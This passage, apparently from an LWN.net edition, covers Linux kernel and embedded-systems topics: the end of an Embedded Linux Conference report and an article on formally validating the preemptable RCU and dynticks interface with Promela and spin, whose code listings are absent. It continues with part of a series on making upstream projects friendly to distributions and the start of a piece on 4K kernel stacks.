than keyboard and mouse, as the input device.  The resolution of the
displays is typically something approaching that of low-end desktops, but
the physical space they take up is far smaller (i.e. the dots per inch or
DPI is high) making it difficult to do development without actual hardware.


The UME project is working with Intel's Moblin.org project to target Atom processor
based systems.  It uses the Hildon
application framework atop GNOME
Mobile, running on an Ubuntu 8.04 (Hardy Heron) distribution.  Mandala
stressed that Linux should be "invisible" on these devices as users just
want applications that work to browse the web, use email, and the like.


The main focus of UME has, so far, been on the user interface, though power
consumption, memory footprint, and speeding up boot times are all on their
radar.  Canonical is very interested in fostering a community around UME,
but that has been "a bit of a challenge", mostly due to a lack of hardware
to run on.  Mandala expects a few different hardware devices to be
available "soon" and that will make it easier to attract a development
community. 


As should come as no surprise after Nokia's purchase of Trolltech early
this year, Alhola announced that Maemo would be supporting both GTK and 
Qt in the near future.  This is part of Nokia's belief that there is "no
single truth", so Maemo supports multiple paths to development on the
platform.  Maemo directly supports C, C++, and Python, while the community
has added support for Java, Objective C, Vala, and Mono. 


Nokia makes a very clear distinction in its product line between phones,
which are largely closed platforms, and tablets, which are open.  Open
source software is an essential part of their strategy as they want to
build an application ecosystem around their products. "We are taking open
source to the consumer mainstream," Alhola explains.


One of the interesting tools that Nokia is working on as part of Maemo is
Scratchbox, which is a toolkit
geared towards making cross-compilation easier.  It does this by making the
development environment look and act like the execution environment, using
QEMU to simulate the
target hardware.  Scratchbox supports both ARM and x86 targets, with
experimental support for additional architectures.  It uses standard
toolchains and distributions where possible and is released under the GPL.

LogFS

LogFS is a flash filesystem that is targeted at the larger flash devices
that are becoming more widespread.  Unlike some filesystems currently in
use, most notably jffs2, LogFS is specifically designed to avoid some of
the performance and scalability problems that come with larger
devices. Jörn Engel is the developer of LogFS, with some support from
the Consumer Electronics Linux Forum
(sponsor of ELC), so he gave an update on the status of the project.


Engel used an unconventional scale (the sucks/rules meter) to measure the
progress that had been made in the last year.  The scale runs from -10 to
10 and measures the "suckiness" of particular features
of the filesystem.  Taking a page from This Is Spinal Tap, the score for the
mount speed of LogFS was measured at 11 both last year and this.  It is
clearly the feature that Engel is most proud of as it takes 10-60ms to
mount a filesystem; a similarly sized jffs2 takes on the order of one second.


Engel looked at around ten separate attributes of the filesystem, first
rating them on where LogFS was a year ago, then re-rating based on where it
is today.  The conclusion is that the average measure has moved from -2.75
to -0.55, so that "on average, it hardly sucks".  He says he is getting
confident enough to submit it to Andrew Morton for inclusion in his tree,
hopefully on its way into the mainline.  Engel is clearly somewhat
frustrated with people who are waiting until it is "done" to start using
LogFS—though there are some fairly serious usability problems that
would tend to limit testers—proclaiming: "LogFS is finished, try
it now, today!"

In conclusion

There were more talks, of course, as well as an active "hallway track" for
the roughly 175 participants.  ELC is a well-run and very interesting
conference that is worth consideration for anyone who uses, or plans to
use, Linux as an embedded operating system.  This year's venue, the Computer History Museum was
a nice facility for a conference of this size.  It also had some great
exhibits that will bring back memories for anyone who has been
using computers, calculators, or game systems over the past 50 years or
so—well worth a visit when one is in Silicon Valley.


		Integrating and Validating dynticks and Preemptable RCU


Introduction
Read-copy update (RCU) is a synchronization mechanism that was added to
the Linux kernel in October of 2002.
RCU is most frequently described as a replacement for reader-writer locking,
but it has also been used in a number of other ways.
RCU is notable in that RCU readers do not directly synchronize with
RCU updaters,
which makes RCU read paths extremely fast, and also
permits RCU readers to accomplish useful work even
when running concurrently with RCU updaters.

In early 2008, a preemptable variant of RCU was accepted into
mainline Linux in support of real-time workloads, a variant similar
to the RCU implementations in

the -rt patchset
since August 2005.
Preemptable RCU is needed for real-time workloads because older
RCU implementations disable preemption across RCU read-side
critical sections, resulting in excessive real-time latencies.

However, one disadvantage of the -rt implementation was that each grace period
required work to be done on each CPU, even if that CPU is in a low-power
“dynticks-idle” state,
and thus incapable of executing RCU read-side critical sections.
The idea behind the dynticks-idle state is that idle CPUs
should be physically powered down in order to conserve energy.
In short, preemptable RCU can disable a valuable energy-conservation
feature of recent Linux kernels.
Although Josh Triplett and Paul McKenney
had discussed some approaches for allowing
CPUs to remain in low-power state throughout an RCU grace period
(thus preserving the Linux kernel's ability to conserve energy), matters
did not come to a head until Steve Rostedt integrated a new dyntick
implementation with preemptable RCU in the -rt patchset.

This combination caused one of Steve's systems to hang on boot, so in
October, Paul coded up a dynticks-friendly modification to preemptable RCU's
grace-period processing.
Steve coded up rcu_irq_enter() and rcu_irq_exit()
interfaces called from the
irq_enter() and irq_exit() interrupt
entry/exit functions.
These rcu_irq_enter() and rcu_irq_exit()
functions are needed to allow RCU to reliably handle situations where
a dynticks-idle CPUs is momentarily powered up for an interrupt
handler containing RCU read-side critical sections.
With these changes in place, Steve's system booted reliably,
but Paul continued inspecting the code periodically on the assumption
that we could not possibly have gotten the code right on the first try.

Paul reviewed the code repeatedly from October 2007 to February 2008,
and almost always found at least one bug.
In one case, Paul even coded and tested a fix before realizing that the
bug was illusory, but in all cases, the “bug” was in
fact illusory.

Near the end of February, Paul grew tired of this game.
He therefore decided to enlist the aid of
Promela and spin,
as described in the LWN article

Using Promela and Spin to verify parallel algorithms.
This article presents a series of seven increasingly realistic
Promela models, the last of which passes, consuming about
40GB of main memory for the state space.


Quick Quiz 1:
Yeah, that's great!!!
Now, just what am I supposed to do if I don't happen to have a machine with
40GB of main memory???

More important, Promela and Spin did find a very subtle bug for me!!!


This article is organized as follows:


	Introduction to Preemptable RCU and dynticks

 Task Interface
 Interrupt Interface
 
			Grace-Period Interface

 
		Validating Preemptable RCU and dynticks

 Basic Model
 Validating Safety
 Validating Liveness
 Interrupts
 
			Validating Interrupt Handlers
 
			Validating Nested Interrupt Handlers
 
			Validating NMI Handlers


These sections are followed by
conclusions and
answers to the Quick Quizzes.


Introduction to Preemptable RCU and dynticks
The per-CPU dynticks_progress_counter variable is
central to the interface between dynticks and preemptable RCU.
This variable has an even value whenever the corresponding CPU
is in dynticks-idle mode, and an odd value otherwise.
A CPU exits dynticks-idle mode for the following three reasons:


	to start running a task,
	when entering the outermost of a possibly nested set of interrupt
	handlers, and
	when entering an NMI handler.

Preemptable RCU's grace-period machinery samples the value of
the dynticks_progress_counter variable in order to
determine when a dynticks-idle CPU may safely be ignored.

The following three sections give an overview of the task
interface, the interrupt/NMI interface, and the use of
the dynticks_progress_counter variable by the
grace-period machinery.


Task Interface
When a given CPU enters dynticks-idle mode because it has no more
tasks to run, it invokes rcu_enter_nohz():


This function simply increments dynticks_progress_counter and
checks that the result is even, but first executing a memory barrier
to ensure that any other CPU that sees the new value of
dynticks_progress_counter will also see the completion
of any prior RCU read-side critical sections.

Similarly, when a CPU that is in dynticks-idle mode prepares to
start executing a newly runnable task, it invokes
rcu_exit_nohz:


This function again increments dynticks_progress_counter,
but follows it with a memory barrier to ensure that if any other CPU
sees the result of any subsequent RCU read-side critical section,
then that other CPU will also see the incremented value of
dynticks_progress_counter.
Finally, rcu_exit_nohz() checks that the result of the
increment is an odd value.

The rcu_enter_nohz() and rcu_exit_nohz
functions handle the case where a CPU enters and exits dynticks-idle
mode due to task execution, but does not handle interrupts, which are
covered in the following section.


Interrupt Interface
The rcu_irq_enter() and rcu_irq_exit()
functions handle interrupt/NMI entry and exit, respectively.
Of course, nested interrupts must also be properly accounted for.
The possibility of nested interrupts is handled by a second per-CPU
variable, rcu_update_flag, which is incremented upon
entry to an interrupt or NMI handler (in rcu_irq_enter())
and is decremented upon exit (in rcu_irq_exit()).
In addition, the pre-existing in_interrupt() primitive is
used to distinguish between an outermost or a nested interrupt/NMI.

Interrupt entry is handled by the rcu_irq_enter
shown below:


Quick Quiz 2:
Why not simply increment rcu_update_flag, and then only
increment dynticks_progress_counter if the old value
of rcu_update_flag was zero???

Quick Quiz 3:
But if line 7 finds that we are the outermost interrupt, wouldn't
we always need to increment dynticks_progress_counter?

Line 3 fetches the current CPU's number, while lines 4 and 5
increment the rcu_update_flag nesting counter if it
is already non-zero.
Lines 6 and 7 check to see whether we are the outermost level of
interrupt, and, if so, whether dynticks_progress_counter
needs to be incremented.
If so, line 9 increments dynticks_progress_counter,
line 10 executes a memory barrier, and line 11 increments
rcu_update_flag.
As with rcu_exit_nohz(), the memory barrier ensures that
any other CPU that sees the effects of an RCU read-side critical section
in the interrupt handler (following the rcu_irq_enter()
invocation) will also see the increment of
dynticks_progress_counter.


Interrupt entry is handled similarly by
rcu_irq_exit():


Line 3 fetches the current CPU's number, as before.
Line 5 checks to see if the rcu_update_flag is
non-zero, returning immediately (via falling off the end of the
function) if not.
Otherwise, lines 6 through 11 come into play.
Line 6 decrements rcu_update_flag, returning
if the result is not zero.
Line 8 verifies that we are indeed leaving the outermost
level of nested interrupts, line 9 executes a memory barrier,
line 10 increments dynticks_progress_counter,
and line 11 verifies that this variable is now even.
As with rcu_enter_nohz(), the memory barrier ensures that
any other CPU that sees the increment of
dynticks_progress_counter
will also see the effects of an RCU read-side critical section
in the interrupt handler (preceding the rcu_irq_enter()
invocation).

These two sections have described how the
dynticks_progress_counter variable is maintained during
entry to and exit from dynticks-idle mode, both by tasks and by
interrupts and NMIs.
The following section describes how this variable is used by
preemptable RCU's grace-period machinery.


Grace-Period Interface
Of the four preemptable RCU grace-period states shown below
(taken from 
The Design of Preemptable Read-Copy Update),
only the rcu_try_flip_waitack_state()
and rcu_try_flip_waitmb_state() states need to wait
for other CPUs to respond.


Of course, if a given CPU is in dynticks-idle state, we shouldn't
wait for it.
Therefore, just before entering one of these two states,
the preceding state takes a snapshot of each CPU's
dynticks_progress_counter variable, placing the
snapshot in another per-CPU variable,
rcu_dyntick_snapshot.
This is accomplished by invoking
dyntick_save_progress_counter, shown below:


The rcu_try_flip_waitack_state() state invokes
rcu_try_flip_waitack_needed(), shown below:
 

Lines 7 and 8 pick up current and snapshot versions of
dynticks_progress_counter, respectively.
The memory barrier on line ensures that the counter checks
in the later rcu_try_flip_waitzero_state follow
the fetches of these counters.
Lines 10 and 11 return zero (meaning no communication with the
specified CPU is required) if that CPU has remained in dynticks-idle
state since the time that the snapshot was taken.
Similarly, lines 12 and 13 return zero if that CPU was initially
in dynticks-idle state or if it has completely passed through a
dynticks-idle state.
In both these cases, there is no way that that CPU could have retained
the old value of the grace-period counter.
If neither of these conditions hold, line 14 returns one, meaning
that the CPU needs to explicitly respond.

For its part, the rcu_try_flip_waitmb_state state
invokes rcu_try_flip_waitmb_needed(), shown below:


This is quite similar to rcu_try_flip_waitack_needed,
the difference being in lines 12 and 13, because any transition
either to or from dynticks-idle state executes the memory barrier
needed by the rcu_try_flip_waitmb_state() state.


Quick Quiz 4:
Can you spot any bugs in any of the code in this section?

We now have seen all the code involved in the interface between
RCU and the dynticks-idle state.
The next section builds up the Promela model used to validate this
code.


Validating Preemptable RCU and dynticks
This section develops a Promela model for the interface between
dynticks and RCU step by step, with each of the following sections
illustrating one step, starting with the process-level code,
adding assertions, interrupts, and finally NMIs.


Basic Model
This section translates the process-level dynticks entry/exit
code and the grace-period processing into
Promela.
We start with rcu_exit_nohz() and
rcu_enter_nohz()
from the 2.6.25-rc4 kernel, placing these in a single Promela
process that models exiting and entering dynticks-idle mode in
a loop as follows:


Lines 6 and 20 define a loop.
Line 7 exits the loop once the loop counter i
has exceeded the limit MAX_DYNTICK_LOOP_NOHZ.
Line 8 tells the loop construct to execute lines 9-19
for each pass through the loop.
Because the conditionals on lines 7 and 8 are exclusive of
each other, the normal Promela random selection of true conditions
is disabled.
Lines 9 and 11 model rcu_exit_nohz()'s non-atomic
increment of dynticks_progress_counter, while
line 12 models the WARN_ON().
The atomic construct simply reduces the Promela state space,
given that the WARN_ON() is not strictly speaking part
of the algorithm.
Lines 14-18 similarly models the increment and
WARN_ON() for rcu_enter_nohz().
Finally, line 19 increments the loop counter.


Quick Quiz 5:
Why isn't the memory barrier in rcu_exit_nohz()
and rcu_enter_nohz() modeled in Promela?

Quick Quiz 6:
Isn't it a bit strange to model rcu_exit_nohz()
followed by rcu_enter_nohz()?
Wouldn't it be more natural to instead model entry before exit?

Each pass through the loop therefore models a CPU exiting
dynticks-idle mode (for example, starting to execute a task), then
re-entering dynticks-idle mode (for example, that same task blocking).


The next step is to model the interface to RCU's grace-period
processing.
For this, we need to model
dyntick_save_progress_counter(),
rcu_try_flip_waitack_needed(),
rcu_try_flip_waitmb_needed(),
as well as portions of
rcu_try_flip_waitack() and
rcu_try_flip_waitmb(), all from the 2.6.25-rc4 kernel.
The following grace_period() Promela process models
these functions as they would be invoked during a single pass
through preemptable RCU's grace-period processing.


Lines 6-9 print out the loop limit (but only into the .trail file
in case of error) and model a line of code
from rcu_try_flip_idle() and its call to
dyntick_save_progress_counter(), which takes a
snapshot of the current CPU's dynticks_progress_counter
variable.
These two lines are executed atomically to reduce state space.

Lines 10-22 model the relevant code in
rcu_try_flip_waitack() and its call to
rcu_try_flip_waitack_needed().
This loop is modeling the grace-period state machine waiting for
a counter-flip acknowledgment from each CPU, but only that part
that interacts with dynticks-idle CPUs.

Line 23 models a line from rcu_try_flip_waitzero()
and its call to dyntick_save_progress_counter(), again
taking a snapshot of the CPU's dynticks_progress_counter
variable.

Finally, lines 24-36 model the relevant code in
rcu_try_flip_waitack() and its call to
rcu_try_flip_waitack_needed().
This loop is modeling the grace-period state-machine waiting for
each CPU to execute a memory barrier, but again only that part
that interacts with dynticks-idle CPUs.


Quick Quiz 7:
Wait a minute!
In the Linux kernel, both dynticks_progress_counter and
rcu_dyntick_snapshot are per-CPU variables.
So why are they instead being modeled as single global variables?

The resulting
model,
when run with the
runspin.sh script,
generates 691 states and
passes without errors, which is not at all surprising given that
it completely lacks the assertions that could find failures.
The next section therefore adds safety assertions.


Validating Safety
A safe RCU implementation must never permit a grace period to
complete before the completion of any RCU readers that started
before the start of the grace period.
This is modeled by a grace_period_state variable that
can take on three states as follows:
 

The grace_period() process sets this variable as it
progresses through the grace-period phases, as shown below:


Quick Quiz 8:
Given there are a pair of back-to-back changes to
grace_period_state on lines 25 and 26,
how can we be sure that line 25's changes won't be lost?


Lines 6, 10, 25, 26, 29, and 44 update this variable (combining
atomically with algorithmic operations where feasible) to
allow the dyntick_nohz() process to validate the basic
RCU safety property.
The form of this validation is to assert that the value of the
grace_period_state variable cannot jump from
GP_IDLE to GP_DONE during a time period
over which RCU readers could plausibly persist.


The dyntick_nohz() Promela process implements
this validation as shown below:


Line 13 sets a new old_gp_idle flag if the
value of the grace_period_state variable is
GP_IDLE at the beginning of task execution,
and the assertion at line 18 fires if the grace_period_state
variable has advanced to GP_DONE during task execution,
which would be illegal given that a single RCU read-side critical
section could span the entire intervening time period.

The resulting
model,
when run with the runspin.sh script,
generates 964 states and passes without errors, which is reassuring.
That said, although safety is critically important, it is also quite
important to avoid indefinitely stalling grace periods.
The next section therefore covers validating liveness.


Validating Liveness
Although liveness can be difficult to prove, there is a simple
trick that applies here.
The first step is to make dyntick_nohz() indicate that
it is done via a dyntick_nohz_done variable, as shown on
line 26 of the following:
 

With this variable in place, we can add assertions to
grace_period() to check for unnecessary blockage
as follows:
 

We have added the shouldexit variable on line 5,
which we initialize to zero on line 10.
Line 17 asserts that shouldexit is not set, while
line 18 sets shouldexit to the dyntick_nohz_done
variable maintained by dyntick_nohz().
This assertion will therefore trigger if we attempt to take more than
one pass through the wait-for-counter-flip-acknowledgment
loop after dyntick_nohz() has completed
execution.
After all, if dyntick_nohz() is done, then there cannot be
any more state changes to force us out of the loop, so going through twice
in this state means an infinite loop, which in turn means no end to the
grace period.

Lines 32, 39, and 40 operate in a similar manner for the
second (memory-barrier) loop.

However, running this
model
results in failure, as line 23 is checking that the wrong variable
is even.
Upon failure, spin writes out a
“trail”
file, which records the sequence of states that lead to the failure.
Use the spin -t -p -g -l dyntickRCU-base-sl-busted.spin
command to cause spin to retrace this sequence of states,

printing the statements executed and the values of variables.
Note that the line numbers do not match the listing above due to
the fact that spin takes both functions in a single file.
However, the line numbers do match the full model.

We see that the dyntick_nohz() process completed
at step 34 (search for “34:”), but that the
grace_period() process nonetheless failed to exit the loop.
The value of curr is 6 (see step 35)
and that the value of snap is 5 (see step 17).
Therefore the first condition on line 21 above does not hold because
curr != snap, and the second condition on line 23
does not hold either because snap is odd and because
curr is only one greater than snap.

So one of these two conditions has to be incorrect.
Referring to the comment block in rcu_try_flip_waitack_needed()
for the first condition:


The first condition does match this, because if curr == snap
and if curr is even, then the corresponding CPU has been
in dynticks-idle mode the entire time, as required.
So let's look at the comment block for the second condition:


The first part of the condition is correct, because if curr
and snap differ by two, there will be at least one even
number in between, corresponding to having passed completely through
a dynticks-idle phase.
However, the second part of the condition corresponds to having
started in dynticks-idle mode, not having finished
in this mode.
We therefore need to be testing curr rather than
snap for being an even number.

The corrected C code is as follows:
 

Making the corresponding correction in the
model
results in a correct validation with 661 states that passes without
errors.
However, it is worth noting that the first version of the liveness
validation failed to catch this bug, due to a bug in the liveness
validation itself.
This liveness-validation bug was located by inserting an infinite
loop in the grace_period() process, and noting that
the liveness-validation code failed to detect this problem!

We have now successfully validated both safety and liveness
conditions, but only for processes running and blocking.
We also need to handle interrupts, a task taken up in the next section.


Interrupts
There are a couple of ways to model interrupts in Promela:

	using C-preprocessor tricks to insert the interrupt handler
	between each and every statement of the dynticks_nohz()
	process, or
	modeling the interrupt handler with a separate process.

A bit of thought indicated that the second approach would have a
smaller state space, though it requires that the interrupt handler
somehow run atomically with respect to the dynticks_nohz()
process, but not with respect to the grace_period()
process.

Fortunately, it turns out that Promela permits you to branch
out of atomic statements.
This trick allows us to have the interrupt handler set a flag, and
recode dynticks_nohz() to atomically check this flag
and execute only when the flag is not set.
This can be accomplished with a C-preprocessor macro that takes
a label and a Promela statement as follows:


One might use this macro as follows:

Line 2 of the macro creates the specified statement label.
Lines 3-8 are an atomic block that tests the in_dyntick_irq
variable, and if this variable is set (indicating that the interrupt
handler is active), branches out of the atomic block back to the
label.
Otherwise, line 6 executes the specified statement.
The overall effect is that mainline execution stalls any time an interrupt
is active, as required.


Validating Interrupt Handlers
The first step is to convert dyntick_nohz() to
EXECUTE_MAINLINE() form, as follows:


Quick Quiz 9:
But what would you do if you needed the statements in a single
EXECUTE_MAINLINE() group to execute non-atomically?

Quick Quiz 10:
But what if the dynticks_nohz() process had “if”
or “do”
statements with conditions, where the statement bodies of these constructs
needed to execute non-atomically?


It is important to note that when a group of statements is passed
to EXECUTE_MAINLINE(), as in lines 11-14, all
statements in that group execute atomically.


The next step is to write a dyntick_irq() process
to model an interrupt handler:


Quick Quiz 11:
Why are lines 44 and 45 (the in_dyntick_irq = 0;
and the i++;) executed atomically?

Quick Quiz 12:
What property of interrupts is this dynticks_irq() process
unable to model?

The loop from line 7-47 models up to MAX_DYNTICK_LOOP_IRQ
interrupts, with lines 8 and 9 forming the loop condition and line 45
incrementing the control variable.
Line 10 tells dyntick_nohz() that an interrupt handler
is running, and line 44 tells dyntick_nohz() that this
handler has completed.
Line 48 is used for liveness validation, much as is the corresponding
line of dyntick_nohz().


Lines 11-24 model rcu_irq_enter(), and
lines 25 and 26 model the relevant snippet of __irq_enter().
Lines 27 and 28 validate safety in much the same manner as do the
corresponding lines of dynticks_nohz().
Lines 29 and 30 model the relevant snippet of __irq_exit(),
and finally lines 31-42 model rcu_irq_exit().


The implementation of grace_period() is very similar
to the earlier one.
The only changes are the addition of line 10 to add the new
interrupt-count parameter and changes to lines 19 and 41 to
add the new dyntick_irq_done variable to the liveness
checks.

This model
results in a correct validation with roughly half a million
states, passing without errors.
However, this version of the model does not handle nested
interrupts.
This topic is taken up in the next section.


Validating Nested Interrupt Handlers
Nested interrupt handlers may be modeled by splitting the body of
the loop in dyntick_irq() as follows:


This is similar to the earlier dynticks_irq() process.
It adds a second counter variable j on line 5, so that
i counts entries to interrupt handlers and j
counts exits.
The outermost variable on line 7 helps determine
when the grace_period_state variable needs to be sampled
for the safety checks.
The loop-exit check on line 10 is updated to require that the
specified number of interrupt handlers are exited as well as entered,
and the increment of i is moved to line 39, which is
the end of the interrupt-entry model.
Lines 12-15 set the outermost variable to indicate
whether this is the outermost of a set of nested interrupts and to
set the in_dyntick_irq variable that is used by the
dyntick_nohz() process.
Lines 32-37 capture the state of the grace_period_state
variable, but only when in the outermost interrupt handler.

Line 40 has the do-loop conditional for interrupt-exit modeling:
as long as we have exited fewer interrupts than we have entered, it is
legal to exit another interrupt.
Lines 41-48 check the safety criterion, but only if we are exiting
from the outermost interrupt level.
Finally, lines 63-66 increment the interrupt-exit count j
and, if this is the outermost interrupt level, clears
in_dyntick_irq.

This model
results in a correct validation with a bit more than half a million
states, passing without errors.
However, this version of the model does not handle NMIs,
which are taken up in the nest section.


Validating NMI Handlers
We take the same general approach for NMIs as we do for interrupts,
keeping in mind that NMIs do not nest.
This results in a dyntick_nmi() process as follows:


Of course, the fact that we have NMIs requires adjustments in
the other components.
For example, the EXECUTE_MAINLINE() macro now needs to
pay attention to the NMI handler (in_dyntick_nmi) as well
as the interrupt handler (in_dyntick_irq) by checking
the dyntick_nmi_done variable as follows:


We will also need to introduce an EXECUTE_IRQ()
macro that checks in_dyntick_nmi in order to allow
dyntick_irq() to exclude dyntick_nmi():


It is further necessary to convert dyntick_irq()
to EXECUTE_IRQ() as follows:


Note that we have open-coded the “if” statements
(for example, lines 16-28).
In addition, statements that process strictly local state
(such as line 56) need not exclude dyntick_nmi().

Finally, grace_period() requires only a few changes:


We have added the printf() for the new
MAX_DYNTICK_LOOP_NMI parameter on line 11 and
added dyntick_nmi_done to the shouldexit
assignments on lines 22 and 46.


Quick Quiz 13:
Do you always write your code in this painfully incremental manner???

The model
results in a correct validation with several hundred million
states, passing without errors.


Conclusions
This effort provided some lessons (re)learned:

Promela and spin can validate interrupt/NMI-handler
interactions.

Documenting code can help locate bugs.
In this case, the documentation effort located
this bug.

Validate your code early, often, and up to the point
of destruction.
This effort located one subtle
bug
that might have been quite difficult to test or debug.

Always validate your validation code.
The usual way to do this is to insert a deliberate bug
and verify that the validation code catches it.  Of course,
if the validation code fails to catch this bug, you may also
need to verify the bug itself, and so on, recursing infinitely.
However, if you find yourself in this position,
getting a good night's sleep
can be an extremely effective debugging technique.

Finally, if cmpxchg instructions ever become
inexpensive enough to tolerate them in the interrupt fastpath, their use
could greatly simplify this code.
The Promela model for an atomic-instruction-based implementation of
this code has more than an order of magnitude fewer states, and the
C code is much easier to understand.
On the other hand, one must take care when using cmpxchg
instructions, as some code sequences, if highly contended, can result
in starvation.
This situation is particularly likely to occur when part of the
algorithm uses cmpxchg, other parts of the algorithm
use atomic instructions that cannot fail (e.g., atomic increment),
contention for the variable in question is high, and the code is
running on a NUMA or a shared-cache machine.
Sadly, almost all multi-socket systems with either multi-core or
multi-threaded CPUs fit this description.

Acknowledgments
We are indebted to Andrew Theurer, who maintains the large-memory machine
that ran the full test.
We all owe a debt of gratitude to Vara Prasad for his help in rendering
this article human-readable.


		Distribution-friendly projects Part 3


[Editor's note: This article, which looks at the interactions of software
projects and distribution providers, is presented in three parts. Part 1 introduces the issues downstream
distributions have with upstream software providers.  Part 2 covers the technical needs of the
distributions.]

Philosophical requests

The philosophical side of packaging is mostly of concern to the users,
although the global goals of the distribution will have some philosophical
issues as well.  In this section I'll try to cover the most common requests
of the downstream distributions to the various upstream providers.
<!-- LWNPutAdHere -->

Technical requests can usually be taken care of with compromises and
options at build-time, so a solution will usually be found in time.
Philosophical needs, on the other hand, often put distributions and
original developers on two opposite positions, and cannot be fixed unless
one of the two accepts the position of the other.

While technical needs are usually shared between distributions,
different distributions have different goals, and in turn different
philosophical needs, and this adds to the problem. A project wanting
to accommodate the requests from a distribution might make life more
difficult for another, that has different philosophical issues.

User expectations Users of a distribution usually expect a
certain behaviour from the software they install. For graphical
applications, they also might expect a certain graphical aspect so
that all the applications blend in together. These problems may be
easier to solve as non-technical concerns go, as they usually require
providing more choices.

One common example comes with fonts in graphical environments: most
distributions these days ship with all the graphical applications set to
use the same font family. This is done to follow the style rule of
using as few different fonts in a single view as possible (you don't
usually see a book using ten or twelve different fonts in the
text). So one common request is for software to provide a way to
change the default font without user intervention (which otherwise
often involves changing the source code).

This still seems to be a technical issue; for example, using TrueType fonts
requires the use of some sophisticated libraries for font rendering.  Some
projects don't want to complicate their code with them. Similarly, some
distributions like to provide anti-aliasing for the default fonts, but some
projects dislike the whole idea of using anti-aliased fonts.

A similar issue might arise with GUI toolkits. Distributions tend to
provide the same graphical aspect for the software they install, this
usually means that both GTK+ and Qt are set to a similar, if not
identical, themes. So one other thing distributions might like is for
graphical software to rely on a theme-capable toolkit. Themes and
skin, though, are often disliked by minor projects, which might also
not be using GTK+ or Qt toolkits, as they tend to make the code more
complex and slow.

Users expect to be able to set their language preference and to have all
applications use that language.  Unfortunately adding support for
translations is a far from trivial task, and adds complexity to the
software, which is something that especially smaller software projects try
to avoid.  Similar complexity stems also from supporting text
encoding like UTF-8, which - for certain distributions like Fedora -
is a prerequisite for the software to be added to their repository.

It's easy to see that user requests are often pretty complex and hard
to implement on many existing projects. The best way to make a
project more appealing for distributions is to start from the
beginning with these points in mind.

Distribution philosophical policies There are also
distribution policies regarding issues that are simply
philosophical. In this category you can find the requests of distributions
for removing code that deals with non-free formats, like most multimedia
formats. All these issues are usually centered around licensing, copyright
and patent-encumbered formats or algorithms:


 Multimedia formats, video, audio or picture formats
are often considered patent-encumbered (sometimes with the exception of
Xiph formats like Ogg, Vorbis and Theora).  Most distributions would like
support for these to always be optional, for this reason.  This
might actually start to be a problem for multimedia applications as their
main goal is just to provide support for these patent-encumbered formats.
 Usage of GPL-incompatible libraries by GPL
  applications, and other forms of licenses mixing is a quite big issue for
  almost all binary distributions.  Some distributions will not be able to
  legally redistribute packages with licensing issues.  This is why
  distributions often push for optional support for GnuTLS as a replacement
  for OpenSSL, or build packages without SSL support by default.  (In
  addition to license problems, SSL support is also encumbered with special
  cryptography legislation, which makes its handling even more a
  problem).
 In both multimedia and cryptography there is the problem of
  patent-encumbered algorithms.  Even when the format
  itself is not encumbered, the algorithm used to generate the result might
  be.  Distributions want a way to opt-out some of the support in the
  software.
 Support for network analysis tools can also be a
  problem.  While the boundary between analysis and
  cracking can be quite thin, laws like the ones enacted in
  Germany start making it difficult for distributions to carry tools
  that are even well inside the definition of network analysis rather
  than network cracking.


For some distributions, there are extra policies that depend on the
license used by the project itself. For instance if they disallow
changes to the source (verbatim copy only) they might disallow the
distribution from taking the proper steps to fix technical issues.

Each distribution has its philosophical goals, such as a focus on Free
Software or a focus on corporate users.  These goals will influence the
distribution's view of philosophical issues.  Companies tend to take a more
defensive look at these issues than community projects.  European projects
tend to be more lax when it comes to software patent problems, and other
countries don't enforce copyright laws.  These are the types of factors
that will affect a distribution's philosophical goals.

Conclusions The issues described in this section can also
conflict directly with the goals of the upstream project (and they often
do), in which case the project is very unlikely to be packaged officially
by at least some distributions.

This is why I categorized these issues under the philosophical
name rather than technical. It's actually fairly common that
issues of this kind sprout debates inside and outside projects and
distributions, as developers and maintainers have very different
feelings about them.

One example is a software package in which the team is composed entirely by
native English speakers. Such a project has a fair chance to start without
considering that some users might expect the user interface to be available
in any other language. While this might sound a bit harsh, it's
often true.

It is nearly impossible for a project to satisfy these issues
altogether for every possible distribution. And it becomes even harder
when the project itself focuses on keeping the code as simple as
possible, even when that means ignoring features and optimizations
that require adding complexity.

For this reason, the issues listed here have to be taken as suggestions,
rather than requirements, depending on the original goals for the
project. If the project wants to be widely accepted though, it will need to
provide a good mitigation method for these issues.

Afterword

In addition to these issues, that relate directly with the source and
the software, there are some extra suggestions that can be given to
make the whole project friendlier to distributors, entailing process
and workflow changes.

Making it visible in the source code who and where to send patches and
suggestions is certainly a nice initial step. When preparing a patch
for software that misbehaves, it's usually simpler to read the
documentation shipped with the software.  Distribution developers are less
likely to open a browser to check the homepage of the software, looking for
the address to use.  This also means that you should always make sure to
update your address referenced in the software documentation. If you change
your email address, and the old one is no longer reachable, it is a good
idea to re-roll the tarball even if no code changes are present (in these
cases, adding a suffix to the tarball is better than changing the version).

Even better, having a public way to track patches is often useful:
distributions can easily see if someone else fixed that issue before, and
how. It might save a downstream maintainer some work, and it helps having a
solution that works for more than one person at a time.

Acknowledging the patches, and pointing out what is not going to work,
is something that helps reduce the frustration for maintainers, as
it allows them to better suit the coding style of the project each
time. Ignoring a patch entirely is not a good idea, as these patches are
rarely non-issues.

It's also important to notice that almost always the patches don't
concern optimizations. Most distributions are generally less concerned with
the performance of the software over the correctness as defined by their
own policies.  Distributions would often prefer to reduce the speed of the
software if that makes it better follow their policy.  This has also to be
understood and accepted, and at the best worked around by either improving
the optimization, allowing an option, or by making a trade off.

Having a public repository for the source is often helpful, but often not
in major ways.  While it makes it easier for the downstream maintainers to
check the progress of the code, it might not be trivial to identify where
the correct source is.  If the project uses branches it might well be that
the upstream developers have already moved away from the broken code by the
time a distribution tries to package it. If a repository is available,
regular tagging and branching is helpful, and makes it easier for a
maintainer to find what has actually changed between two or more versions.

Finally This article cannot cover all the possible requests that a
distribution might have, and it does not even get close to all the possible
requests by all possible distributions.  There are even more requests
relating to portability, for distributions that target particular
non-mainstream hardware (e.g. distributions targeting embedded device like
OpenWRT) or distributions for other (Free and non-Free) operating systems
(like Cygwin, Fink or FreeBSD ports). The remaining issues have to be coped
with on an incremental basis, with collaboration of the downstream
maintainers for that distribution.

Following these practices might make it easier for those people to contact
the upstream developers to work out a solution.  They make the project
appear friendlier, just as well as saying Please let us know how we can
improve your users' experience with our software. They change the
mindset of a project so that it makes it less frustrating for packagers to
prepare it for distributions. Going against all these points not only makes
the job harder for the distributors, but might give the (wrong) idea that the
project is not open to accommodating distributions.

		4K stacks by default?


 The kernel stack is a rather important chunk of memory in any Linux
system.  The unpleasant kernel memory corruption that results from
overflowing it is something that is to be avoided at all costs.  But the
stack is allocated for each process and thread in the system, so those who
are looking to reduce memory usage target the 8K stack used by default on
